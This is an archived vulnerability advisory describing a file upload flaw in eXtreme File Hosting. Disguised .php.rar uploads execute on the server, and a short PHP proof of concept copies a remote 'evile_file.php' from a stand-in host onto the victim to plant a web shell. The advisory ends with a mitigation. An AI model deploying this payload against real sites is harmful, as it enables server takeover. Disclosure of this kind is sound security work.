AOH :: HP Unsorted E :: C07-2276.HTM

eXtreme File Hosting remote file upload vulnerability



eXtreme File Hosting remote file upload vulnerability
eXtreme File Hosting remote file upload vulnerability



A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell.

bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain 

###########################
'http://sample.com/evile_file.php'; 
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}
?> 
###########################

and upload it the click in download link then this file run and dont download
after run a.php.rar the evile_file.php copy in victim host and attacker can use for hacking server.


Solution:  disable rar file uploading in setting
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com 
Reported By: : hamed bazargani (hamed.bazargani@gmail.com) From I.R.IRAN and all iranian whitehat hacker 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.